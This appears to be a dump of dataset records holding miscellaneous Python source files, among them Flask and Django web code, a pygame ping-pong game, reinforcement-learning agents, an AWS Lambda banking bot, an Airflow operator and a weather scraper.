Task.query.filter_by(taskStatus=form.task_status.data).all()\n tasks = list(set(tasks).intersection(set(task0)))\n if form.task_kind.data:\n task1 = Task.query.filter_by(taskKind=form.task_kind.data).all()\n tasks = list(set(tasks).intersection(set(task1)))\n return render_template(\"search_result.html\", title='Search Result',\n current_time=datetime.utcnow(),\n tasks = tasks)\n return render_template(\"search_task.html\", title=\"Search Task\",\n current_time=datetime.utcnow(),\n form = form)\n\n@app.route('/edit_task/', methods=['GET', 'POST'])\ndef edit_task(tid):\n task = Task.query.get(tid)\n form = editForm()\n if form.errors:\n flash('Errors=\"%s\"' % (form.errors))\n if form.validate_on_submit():\n t = task\n t.taskName = form.task_name.data\n t.taskDate = form.task_date.data\n t.taskKind = form.task_kind.data\n t.taskStatus = form.task_status.data\n t.taskNotice = form.task_notice.data\n db.session.commit()\n return redirect(url_for('view_task'))\n return render_template(\"edit_task.html\", title=\"Edit Task\",\n current_time=datetime.utcnow(),\n task = task,\n form = form)\n\n@app.route('/delete_task/', methods=['GET'])\ndef delete_task(tid):\n task = Task.query.get(tid)\n db.session.delete(task)\n db.session.commit()\n return redirect(url_for('view_task'))\n\n@app.route('/finish_task/', methods=['GET'])\ndef finish_task(tid):\n task = Task.query.get(tid)\n task.taskStatus = True\n db.session.commit()\n return redirect(url_for('view_task'))\n@app.route('/unfinish_task/', methods=['GET'])\ndef unfinish_task(tid):\n task = Task.query.get(tid)\n task.taskStatus = False\n db.session.commit()\n return redirect(url_for('view_task'))\n\n@app.route('/finish_inSearch/', methods=['GET'])\ndef finish_inSearch(tid):\n task = Task.query.get(tid)\n task.taskStatus = True\n db.session.commit()\n return redirect(url_for('search_task'))\n@app.route('/unfinish_inSearch/', methods=['GET'])\ndef unfinish_inSearch(tid):\n task = Task.query.get(tid)\n task.taskStatus = False\n db.session.commit()\n return redirect(url_for('search_task'))\n\n\n# Register for handle error\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html', title=\"Page Not Found\",\n current_time=datetime.utcnow()), 404\n@app.errorhandler(500)\ndef internal_server_error(e):\n return render_template('500.html', title=\"Internal Server Error\",\n current_time=datetime.utcnow()), 500\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196973659","text":"from ARS import *\nimport pickle\n\nenv = 'HalfCheetah-v2'\nseeds = [1, 2, 3, 4, 5]\n\nfor seed in seeds:\n hp = HP(env_name=env, seed=seed, num_samples=8, hidden_size=300, learning_rate=0.01, noise=0.01)\n agent = ARS_TD3(hp)\n reward, step = agent.train()\n pickle.dump((reward, step), open(env + '_ars_seeds_' + str(seed), mode='wb'))\n","sub_path":"run_ars.py","file_name":"run_ars.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"429954503","text":"import pygame\r\npygame.init()\r\nscreen = pygame.display.set_mode([640,480])\r\nbackground = pygame.Surface(screen.get_size())\r\npygame.display.set_caption('PingPong')\r\n\r\nclass Ball(pygame.sprite.Sprite):\r\n def __init__(self,x_speed, y_speed):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.x_speed = x_speed\r\n self.y_speed = y_speed\r\n self.stop = False\r\n self.image = pygame.Surface([20, 20], pygame.SRCALPHA)\r\n self.rect = self.image.get_rect()\r\n self.rect.left = screen.get_width()/2 - self.image.get_width()/2\r\n self.rect.top = screen.get_height()/2 - self.image.get_height()/2\r\n pygame.draw.circle(self.image, [0, 0, 0], [10, 10], 10)\r\n group.add(self)\r\n\r\n def game(self):\r\n global difficult\r\n\r\n if self.rect.top < 0 or self.rect.top > 470:\r\n self.y_speed *= -1\r\n self.rect.top += self.y_speed + self.y_speed * difficult / 25\r\n\r\n group.remove(self)\r\n\r\n if pygame.sprite.spritecollide(self, group, False):\r\n difficult += 3\r\n self.x_speed *= -1\r\n self.rect.left += self.x_speed + self.x_speed * difficult / 50\r\n group.add(self)\r\n\r\n self.rect.left = self.rect.left + self.x_speed + self.x_speed * difficult / 40\r\n self.rect.top = self.rect.top + self.y_speed + self.y_speed * difficult / 20\r\n\r\n\r\n def wait(self):\r\n global wait, your_score, my_score, colised_right, colised_left, difficult\r\n\r\n if colised_left:\r\n your_score = your_score + 1\r\n self.rect.left, self.rect.top = ([screen.get_width() / 2 - ball.image.get_width() / 2 \\\r\n , screen.get_height() / 2 - ball.image.get_height() / 2])\r\n difficult = 1\r\n\r\n if colised_right:\r\n my_score = my_score + 1\r\n self.rect.left, self.rect.top = ([screen.get_width() / 2 - ball.image.get_width() / 2 \\\r\n , screen.get_height() / 2 - ball.image.get_height() / 2])\r\n difficult = 1\r\n\r\n if colised_left or colised_right:\r\n self.stop = True\r\n\r\n if self.stop and wait<100:\r\n wait=wait+1\r\n else:\r\n wait=0\r\n self.stop=False\r\n\r\nclass Paddle(pygame.sprite.Sprite):\r\n def __init__(self, position):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = pygame.Surface([8, 100])\r\n self.image.fill([0,0,0])\r\n self.rect = self.image.get_rect()\r\n self.rect.left, self.rect.top = (position)\r\n group.add(self)\r\n\r\nif __name__ == '__main__':\r\n difficult = 1\r\n colised_left = False\r\n colised_right = False\r\n group = pygame.sprite.Group()\r\n FPS = pygame.time.Clock()\r\n pygame.key.set_repeat(1, 1)\r\n wait=0\r\n myPaddle = Paddle([10,190])\r\n my_score = 0\r\n yourPaddle = Paddle([620,190])\r\n your_score = 0\r\n ball = Ball(5,1)\r\n ball.stop = False\r\n score_font = pygame.font.Font(None,50)\r\n score_surface = score_font.render(str(my_score) + \" \" + str(your_score),1,(0,0,0))\r\n score_position = [screen.get_width()/2 - score_surface.get_width()/2,20]\r\n launched = True\r\n\r\n while launched:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n launched=False\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_UP and yourPaddle.rect.top>=0:\r\n yourPaddle.rect.top = yourPaddle.rect.top - 8\r\n if event.key == pygame.K_DOWN and yourPaddle.rect.top<=380:\r\n yourPaddle.rect.top = yourPaddle.rect.top + 8\r\n if event.key == pygame.K_w and myPaddle.rect.top >= 0:\r\n myPaddle.rect.top = myPaddle.rect.top - 8\r\n if event.key == pygame.K_s and myPaddle.rect.top <= 380:\r\n myPaddle.rect.top = myPaddle.rect.top + 8\r\n\r\n if ball.rect.left < 0:\r\n colised_left = True\r\n\r\n if ball.rect.left > 630:\r\n colised_right = True\r\n\r\n FPS.tick(100)\r\n screen.blit(background,(0,0))\r\n background.fill([0, 255, 255])\r\n background.blit(yourPaddle.image, yourPaddle.rect)\r\n background.blit(myPaddle.image, myPaddle.rect)\r\n background.blit(ball.image, ball.rect)\r\n ball.wait()\r\n\r\n if wait == 0 :\r\n ball.game()\r\n\r\n colised_left = False\r\n colised_right = False\r\n score_surface = score_font.render(str(my_score)+\" \"+str(your_score),1,(0,0,0))\r\n background.blit(score_surface,score_position)\r\n pygame.display.flip()","sub_path":"game1.4.py","file_name":"game1.4.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"189989999","text":"def countones(st):\r\n dc = {}\r\n for i in st:\r\n if i in dc:\r\n dc[i] += 1\r\n else:\r\n dc[i] = 1\r\n c = 0\r\n for i in dc.values():\r\n if i % 2 != 0:\r\n c += 1\r\n return max(0, c-1)\r\nprint(countones(input()))","sub_path":"peragrams.py","file_name":"peragrams.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"647710879","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n#-*- coding: utf-8 -*-\n\nimport parl\nimport paddle\nimport numpy as np\n\n\nclass Agent(parl.Agent):\n def __init__(self, algorithm, act_dim, e_greed=0.1, e_greed_decrement=0):\n super(Agent, self).__init__(algorithm)\n assert isinstance(act_dim, int)\n self.act_dim = act_dim\n\n self.global_step = 0\n self.update_target_steps = 200 # 每隔200个training steps再把model的参数复制到target_model中\n\n self.e_greed = e_greed # 有一定概率随机选取动作,探索\n self.e_greed_decrement = e_greed_decrement # 随着训练逐步收敛,探索的程度慢慢降低\n\n def sample(self, obs):\n \"\"\" 根据观测值 obs 采样(带探索)一个动作\n \"\"\"\n sample = np.random.random() # 产生0~1之间的小数\n if sample < self.e_greed:\n act = np.random.randint(self.act_dim) # 探索:每个动作都有概率被选择\n else:\n act = self.predict(obs) # 选择最优动作\n self.e_greed = max(\n 0.01, self.e_greed - self.e_greed_decrement) # 随着训练逐步收敛,探索的程度慢慢降低\n return act\n\n def predict(self, obs):\n \"\"\" 根据观测值 obs 选择最优动作\n \"\"\"\n obs = paddle.to_tensor(obs, dtype='float32')\n pred_q = self.alg.predict(obs)\n act = int(pred_q.argmax()) # 选择Q最大的下标,即对应的动作\n return act\n\n def learn(self, obs, act, reward, next_obs, terminal):\n \"\"\" 根据训练数据更新一次模型参数\n \"\"\"\n if self.global_step % self.update_target_steps == 0:\n self.alg.sync_target()\n self.global_step += 1\n\n act = np.expand_dims(act, axis=-1)\n reward = np.expand_dims(reward, axis=-1)\n terminal = np.expand_dims(terminal, axis=-1)\n\n obs = paddle.to_tensor(obs, dtype='float32')\n act = paddle.to_tensor(act, dtype='int32')\n reward = paddle.to_tensor(reward, dtype='float32')\n next_obs = paddle.to_tensor(next_obs, dtype='float32')\n terminal = paddle.to_tensor(terminal, dtype='float32')\n loss = self.alg.learn(obs, act, reward, next_obs, terminal) # 训练一次网络\n return float(loss)\n","sub_path":"examples/tutorials/parl2_dygraph/lesson3/homework/dqn_mountaincar/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"400525521","text":"from ckeditor.widgets import CKEditorWidget\nfrom ckeditor_uploader.widgets import CKEditorUploadingWidget\nfrom dal import autocomplete\nfrom django import forms\nfrom .models import Category, Tag, Post\n\nclass PostAdminForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n print('init',args, kwargs)\n if 'instance' in kwargs and kwargs['instance']:\n initial = {}\n instance = kwargs[\"instance\"]\n if instance.is_md:\n initial['content_md'] = instance.content\n else:\n initial['content_ck'] = instance.content\n kwargs.update({'initial':initial})\n super().__init__(*args,**kwargs)\n\n desc = forms.CharField(widget=forms.Textarea, label=\"摘要\", required=False)\n category = forms.ModelChoiceField(\n queryset = Category.objects.all(),\n widget = autocomplete.ModelSelect2(url='category_autocomplete'),\n label=\"分类\",\n )\n tag = forms.ModelMultipleChoiceField(\n queryset = Tag.objects.all(),\n widget = autocomplete.ModelSelect2Multiple(url='tag_autocomplete'),\n label=\"标签\",\n )\n content = forms.CharField(widget = forms.HiddenInput(), label=\"正文\", required=False)\n content_ck = forms.CharField(widget = CKEditorUploadingWidget(), label=\"正文\", required=False)\n content_md = forms.CharField(widget = forms.Textarea(), label=\"正文\", required=False)\n \n class Meta:\n model = Post\n fields = (\n 'category',\n 'tag','title',\n 'desc','is_md',\n 'content','content_ck','content_md',\n 'status')\n \n def save(self, commit=True):\n instance = super().save(commit=False)\n instance.content = self.cleaned_data['content']\n instance.save()\n return instance\n\n def clean(self):\n is_md = self.cleaned_data.get('is_md')\n if is_md:\n content_field_name = 'content_md'\n else:\n content_field_name = 'content_ck'\n content = self.cleaned_data.get(content_field_name)\n if not content:\n self.add_error(content_field_name,'必填内容')\n return\n self.cleaned_data['content']= content\n print(self.cleaned_data)\n return super().clean()","sub_path":"typeit/blog/admin_form.py","file_name":"admin_form.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"250946924","text":"# label.pbtxt -> labels.txt\n\nimport re\n\nlabels = open(\"labels.txt\", \"wb\")\nlabel_pb = open(\"label.pbtxt\", \"r\")\n\nbuff = label_pb.read() # re cannot input direct from open operation.\n\nstr_ids = re.findall('id: (.*?)\\n', buff, re.S) # find all ids.\nstr_labels = re.findall('display_name: \"(.*?)\"', buff, re.S) # find all lables.\n\nint_ids = map(eval, str_ids) # convert all strings to a inter list.\n\nlabel_list = ['NA' for x in range(0, max(int_ids))] # initialize a list with 'NA'\ni = 0\nfor each_id in str_ids:\n label_list[int(each_id) - 1] = str_labels[i];\n i += 1\n\nfor j in range(0, max(int_ids)):\n labels.write(label_list[j] + '\\n')\n\nlabels.close()\n","sub_path":"my/obj_detection/pb2txt.py","file_name":"pb2txt.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"52604504","text":"import os.path\nimport time\nfrom datetime import timedelta\n\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\n\n# How long after creation the upload will expire\nDEFAULT_EXPIRATION_DELTA = timedelta(days=1)\nEXPIRATION_DELTA = getattr(\n settings, \"DRF_CHUNKED_UPLOAD_EXPIRATION_DELTA\", DEFAULT_EXPIRATION_DELTA\n)\n\n# Path where uploading files will be stored until completion\nDEFAULT_UPLOAD_PATH = \"chunked_uploads/%Y/%m/%d\"\nUPLOAD_PATH = getattr(settings, \"DRF_CHUNKED_UPLOAD_PATH\", DEFAULT_UPLOAD_PATH)\n\n# File extensions for upload files\nINCOMPLETE_EXT = getattr(settings, \"DRF_CHUNKED_UPLOAD_INCOMPLETE_EXT\", \".part\")\n\n# upload_to function to be used in the FileField\ndef default_upload_to(instance, filename):\n filename = os.path.join(UPLOAD_PATH, str(instance.id) + INCOMPLETE_EXT)\n return time.strftime(filename)\n\n\nUPLOAD_TO = getattr(settings, \"DRF_CHUNKED_UPLOAD_TO\", default_upload_to)\n\n# Checksum type to use when verifying files\nDEFAULT_CHECKSUM_TYPE = \"md5\"\nCHECKSUM_TYPE = getattr(settings, \"DRF_CHUNKED_UPLOAD_CHECKSUM\", DEFAULT_CHECKSUM_TYPE)\n\n# Storage system\ntry:\n STORAGE = getattr(settings, \"DRF_CHUNKED_UPLOAD_STORAGE_CLASS\", lambda: None)()\nexcept TypeError:\n STORAGE = import_string(\n getattr(settings, \"DRF_CHUNKED_UPLOAD_STORAGE_CLASS\", lambda: None)\n )()\n\n# Boolean that defines if users beside the creator can access an upload record\nUSER_RESTRICTED = getattr(settings, \"DRF_CHUNKED_UPLOAD_USER_RESTRICED\", True)\n\n# Max amount of data (in bytes) that can be uploaded. `None` means no limit\nDEFAULT_MAX_BYTES = None\nMAX_BYTES = getattr(settings, \"DRF_CHUNKED_UPLOAD_MAX_BYTES\", DEFAULT_MAX_BYTES)\n\n# determine the \"null\" and \"blank\" properties of \"user\" field in the \"ChunkedUpload\" model\nDEFAULT_MODEL_USER_FIELD_NULL = getattr(\n settings, \"CHUNKED_UPLOAD_MODEL_USER_FIELD_NULL\", True\n)\nDEFAULT_MODEL_USER_FIELD_BLANK = getattr(\n settings, \"CHUNKED_UPLOAD_MODEL_USER_FIELD_BLANK\", True\n)\n\n# Upload URL\nNAMED_URL = getattr(settings, \"DRF_CHUNKED_UPLOAD_NAMED_URL\", \"chunkedupload-detail\")\n","sub_path":"drf_chunked_upload/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"153932838","text":"#import the Python packages for Lambda to use\r\nimport boto3\r\nfrom boto3.dynamodb.conditions import Key, Attr\r\nimport json\r\nimport decimal\r\nimport datetime\r\nfrom datetime import datetime, timedelta\r\n\r\n#start our Lambda runtime here \r\ndef lambda_handler(event_data, lambda_config):\r\n\r\n #Retrieve ANI from inbound callerID\r\n \r\n # unhide the below code line when using the test script\r\n callerId = event_data[\"sessionAttributes\"][\"CustomerNumber\"]\r\n \r\n # unhide the below code line when NOT using the test script\r\n #callerId = \"+60176053920\"\r\n \r\n #Lex Intent name\r\n intent_name = event_data['currentIntent']['name']\r\n \r\n #Lex session attributes\r\n session_attributes = event_data['sessionAttributes']\r\n \r\n #Establish connection to dynamoDB and retrieve table\r\n dynamodb = boto3.resource('dynamodb')\r\n table = dynamodb.Table('RICHA_ASHISH_DEV')\r\n client = boto3.client('lex-models')\r\n \r\n #Establish connection to dynamoDB and retrieve table\r\n #sns_client = boto3.client('sns')\r\n \r\n #KeyConditionExpression looks for number that equals ANI of inbound call from a dynamoDB table and saves it to response\r\n response = table.query(\r\n KeyConditionExpression=Key('phone_number').eq(callerId)\r\n )\r\n \r\n #will always return list\r\n items = response.get('Items')\r\n \r\n # unhide the below code line when using the test script\r\n cust_acct_type = event_data[\"currentIntent\"][\"slots\"][\"creditCardType\"]\r\n \r\n # unhide the below code line when NOT using the test script\r\n #cust_acct_type = event_data[\"currentIntent\"][\"slots\"][\"ccType\"]\r\n \r\n #print(\"cust_acct_type # \", cust_acct_type)\r\n \r\n cred_1_due_amount = items[0].get('cc_1_due_amount')\r\n cred_1_due_amount = decimal.Decimal(cred_1_due_amount)\r\n acct_balance = cred_1_due_amount\r\n \r\n cred_1_due_date = items[0].get('cc_1_due_date')\r\n cred_1_due_date = decimal.Decimal(cred_1_due_date)\r\n \r\n cred_2_due_amount = items[0].get('cc_2_due_amount')\r\n cred_2_due_amount = decimal.Decimal(cred_2_due_amount)\r\n \r\n cred_2_due_date = items[0].get('cc_2_due_date')\r\n cred_2_due_date = decimal.Decimal(cred_2_due_date)\r\n \r\n \r\n # Calculate days left for credit card payment\r\n paymt_due_date = 8 # to test zero days for payment\r\n \r\n cc1_days_left = paymt_due_date - cred_1_due_date \r\n cc2_days_left = paymt_due_date - cred_2_due_date \r\n \r\n # Apparently, the datetime module is not present in AWS Lambda. To make it work, you'll need to zip the libraries and upload them to Lambda\r\n # dt = date.today() - timedelta(days_to_subtract)\r\n \r\n if not items:\r\n return {'acct_balance_1' : 0, \"acct_type\": \"not available\"}\r\n else:\r\n \r\n if(intent_name == \"checkCreditCardBal\"):\r\n \r\n if (cust_acct_type in (\"platinum\")):\r\n \r\n # Determine bill payment date overdue or not?\r\n \r\n if(cc1_days_left > 0):\r\n \r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + 'And you have ' + str(cc1_days_left) + ' day left to settle the bills.'\r\n \r\n elif(cc1_days_left==0):\r\n \r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + \"And, today is last day to pay bills!\"\r\n \r\n elif(cc1_days_left < 0):\r\n temp = cc1_days_left * -1\r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + 'You are ' + str(temp) + ' day behind credit bill payment!'\r\n \r\n else:\r\n message = \"Invalid!! \"\r\n \r\n return close(session_attributes, \"Fulfilled\", '{}'.format(message))\r\n \r\n elif (cust_acct_type in (\"signature\")):\r\n \r\n # Determine bill payment date overdue or not?\r\n \r\n if(cc2_days_left > 0):\r\n \r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + 'And you have ' + str(cc2_days_left) + ' day left to settle the bills.'\r\n \r\n elif(cc2_days_left == 0):\r\n \r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + \"And, today is last day to pay bills!\"\r\n \r\n elif (cc2_days_left < 0):\r\n temp = cc2_days_left * -1 \r\n print(\"cred_2_due_date = \", cred_2_due_date, \" cc2_days_left= \", cc2_days_left, \" temp= \", temp)\r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + 'You are ' + str(temp) + ' day behind credit bill payment!'\r\n \r\n else:\r\n message = \"Invalid!! \"\r\n \r\n return close(session_attributes, \"Fulfilled\", '{}'.format(message))\r\n \r\ndef close(session_attributes, fulfillment_state, message):\r\n response = {\r\n 'sessionAttributes': session_attributes,\r\n \"dialogAction\": {\r\n \"type\": \"Close\",\r\n \"fulfillmentState\": \"Fulfilled\", \r\n \"message\": {\r\n \"contentType\": \"SSML\",\r\n \"content\": message\r\n }\r\n }\r\n }\r\n return response\r\n \r\ndef build_response_message(message_content):\r\n return {\"contentType\": \"PlainText\", \"content\": message_content}\r\n \r\ndef elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):\r\n return {\r\n 'sessionAttributes': session_attributes,\r\n 'dialogAction': {\r\n 'type': 'ElicitSlot',\r\n 'intentName': intent_name,\r\n 'slots': slots,\r\n 'slotToElicit': slot_to_elicit,\r\n 'message': {\r\n \"contentType\": \"SSML\",\r\n \"content\": message\r\n }\r\n }\r\n }\r\n","sub_path":"scripts/fundamentals/aws_check_user_account_balance_in_awslex.py","file_name":"aws_check_user_account_balance_in_awslex.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131601166","text":"from __future__ import annotations\nfrom pprint import pprint\n\nclass Solution:\n def maximalRectangle(self, matrix: List[List[str]]) -> int:\n n = len(matrix)\n if n==0:\n return 0\n m = len(matrix[0])\n left = [0]*m\n right = [m]*m\n height = [0]*m\n ans = 0\n for i in range(n):\n for j in range(m):\n if matrix[i][j]=='1':\n height[j] = height[j]+1\n else:\n height[j] = 0\n \n cur_left = 0\n for j in range(m):\n if matrix[i][j]=='1':\n left[j] = max(left[j], cur_left)\n else:\n left[j] = 0\n cur_left = j+1\n \n cur_right = m\n for j in range(m-1,-1,-1):\n if matrix[i][j]=='1':\n right[j] = min(right[j], cur_right)\n else:\n right[j] = m\n cur_right = j\n \n for j in range(m):\n ans = max(ans, (right[j]-left[j])*height[j])\n\n pprint(left)\n pprint(right)\n pprint(height)\n print('\\n')\n \n return ans\n\n\ns = Solution()\nmat = [[\"0\",\"1\",\"1\",\"0\",\"1\"],[\"1\",\"1\",\"0\",\"1\",\"0\"],[\"0\",\"1\",\"1\",\"1\",\"0\"],[\"1\",\"1\",\"1\",\"1\",\"0\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"0\",\"0\",\"0\",\"0\",\"0\"]]\npprint(mat)\ns.maximalRectangle(mat)","sub_path":"LeetCode/085. Maximal Rectangle/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"167530705","text":"\"\"\"This file contains the formatter for mybabycart data sources\"\"\"\nimport re\nfrom cmu.transformers.generic import Transformer as BaseTransformer\nfrom django.utils.encoding import smart_unicode\n\nHEADER_MAP = {\n 'default': {\n 'wbn': ['^shipping_number$'],\n 'cl': ['^client$'],\n 'oid': ['^id_order$'],\n 'prd': ['^products$'],\n 'pin': ['^postcode$'],\n 'ctg': ['^goods description$'],\n 'cod': ['^cod value$'],\n }\n}\n\n\nclass Transformer(BaseTransformer):\n \"\"\"Transformer for friendsofbooks\"\"\"\n def __init__(self, **kwargs):\n super(Transformer, self).__init__(HEADER_MAP, **kwargs)\n","sub_path":"cmu/transformers/_mybabycart.py","file_name":"_mybabycart.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"394814493","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/operators/hive_to_mysql.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 4606 bytes\nfrom tempfile import NamedTemporaryFile\nfrom airflow.hooks.hive_hooks import HiveServer2Hook\nfrom airflow.hooks.mysql_hook import MySqlHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nfrom airflow.utils.operator_helpers import context_to_airflow_vars\n\nclass HiveToMySqlTransfer(BaseOperator):\n \"\"\"HiveToMySqlTransfer\"\"\"\n template_fields = ('sql', 'mysql_table', 'mysql_preoperator', 'mysql_postoperator')\n template_ext = ('.sql', )\n ui_color = '#a0e08c'\n\n @apply_defaults\n def __init__(self, sql, mysql_table, hiveserver2_conn_id='hiveserver2_default', mysql_conn_id='mysql_default', mysql_preoperator=None, mysql_postoperator=None, bulk_load=False, *args, **kwargs):\n (super(HiveToMySqlTransfer, self).__init__)(*args, **kwargs)\n self.sql = sql\n self.mysql_table = mysql_table\n self.mysql_conn_id = mysql_conn_id\n self.mysql_preoperator = mysql_preoperator\n self.mysql_postoperator = mysql_postoperator\n self.hiveserver2_conn_id = hiveserver2_conn_id\n self.bulk_load = bulk_load\n\n def execute(self, context):\n hive = HiveServer2Hook(hiveserver2_conn_id=(self.hiveserver2_conn_id))\n self.log.info('Extracting data from Hive: %s', self.sql)\n if self.bulk_load:\n tmpfile = NamedTemporaryFile()\n hive.to_csv((self.sql), (tmpfile.name), delimiter='\\t', lineterminator='\\n',\n output_header=False,\n hive_conf=(context_to_airflow_vars(context)))\n else:\n results = hive.get_records(self.sql)\n mysql = MySqlHook(mysql_conn_id=(self.mysql_conn_id))\n if self.mysql_preoperator:\n self.log.info('Running MySQL preoperator')\n mysql.run(self.mysql_preoperator)\n else:\n self.log.info('Inserting rows into MySQL')\n if self.bulk_load:\n mysql.bulk_load(table=(self.mysql_table), tmp_file=(tmpfile.name))\n tmpfile.close()\n else:\n mysql.insert_rows(table=(self.mysql_table), rows=results)\n if self.mysql_postoperator:\n self.log.info('Running MySQL postoperator')\n mysql.run(self.mysql_postoperator)\n self.log.info('Done.')","sub_path":"pycfiles/apache_beam-2.20.0-cp27-cp27m-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64/hive_to_mysql.cpython-36.py","file_name":"hive_to_mysql.cpython-36.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"227904862","text":"import requests\nimport re\n\nfrom bs4 import BeautifulSoup\nfrom .DayWeatherInfo import DayWeatherShortInfo, DayWeatherFullInfo\n\nfrom parsing.parsing_constants import WEATHER_PAGE\n\n\nclass WeatherParser:\n def __init__(self, city='чернигов', date=''):\n self.html_page = requests.get(WEATHER_PAGE + city.lower() + f'/{date}').text\n self.soup = BeautifulSoup(self.html_page, features=\"html.parser\")\n self.region = self.soup.find('div', class_='currentRegion').text\n\n\n def parse_block_of_weather(self, block):\n date = block.find('p', class_='date').text\n month = block.find('p', class_='month').text\n min_temperature = block.find('div', class_='min').text\n max_temperature = block.find('div', class_='max').text\n\n min_temperature = re.findall('[+-][0-9]+.', min_temperature)[0]\n max_temperature = re.findall('[+-][0-9]+.', max_temperature)[0]\n\n details = self.soup.find('div', {'class': 'wDescription clearfix'}).find('div', {'class': 'description'}).text\n\n return DayWeatherShortInfo(date, month, min_temperature, max_temperature, details)\n\n def parse_day_weather_shortly(self):\n today_block = self.soup.find('div', class_='main loaded')\n return self.parse_block_of_weather(today_block)\n\n def parse_day_weather_fully(self):\n\n data = self.parse_day_weather_shortly()\n\n detail_block = self.soup.find('div', class_='wMain clearfix')\n\n temperatures = [tag.text for tag in detail_block.find('tr', class_='temperature').find_all('td')]\n temperatures_sensation = [tag.text for tag in detail_block.find('tr', class_='temperatureSens').find_all('td')]\n pressure = [tag.text for tag in detail_block.find_all('tr')[5].find_all('td')]\n humidity = [tag.text for tag in detail_block.find_all('tr')[6].find_all('td')]\n\n return DayWeatherFullInfo(data.day, data.month, data.min_temperature, data.max_temperature,\n temperatures, temperatures_sensation, pressure, humidity, data.details)\n\n def parse_7_days_info(self):\n blocks_with_forecast = self.soup.find('div', class_='tabs').find_all('div', class_='main')\n week_data = list(map(self.parse_block_of_weather, blocks_with_forecast))\n\n return week_data\n\n\n\n\n\n","sub_path":"project/parsing/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"306255814","text":"from flask import render_template\n\nfrom app import app # 从app包中导入 app这个实例\n\n#2个路由\n@app.route('/')\n@app.route('/index')\n#1个视图函数\ndef index():\n\tuser = {'username': \"bobo\"}\n\t# 创建一个列表:帖子。里面元素是两个字典,每个字典里元素还是字典,分别作者、帖子内容。\n\tposts = [\n\t\t{\n\t\t\t'author': {'username': 'John'},\n\t\t\t'body': 'Beautiful day in Portland!'\n\t\t},\n\t{\n\t\t'author': {'username': 'Susan'},\n\t\t'body': 'The Avengers movie was so cool!'\n\t}\n\t]\n\treturn render_template('index.html', posts=posts, user=user)","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"589275385","text":"# Выполнить логические побитовые операции «И», «ИЛИ» и др.\n# над числами 5 и 6. Выполнить над числом 5 побитовый сдвиг вправо и влево на два знака.\na = 5\nb = 6\n\na_and_b = a & b\na_xor_b = a ^ b\na_or_b = a | b\n\na_mov_left = 00 >> a\na_mov_right = a << 00\n\nprint('5 AND 6 = ', 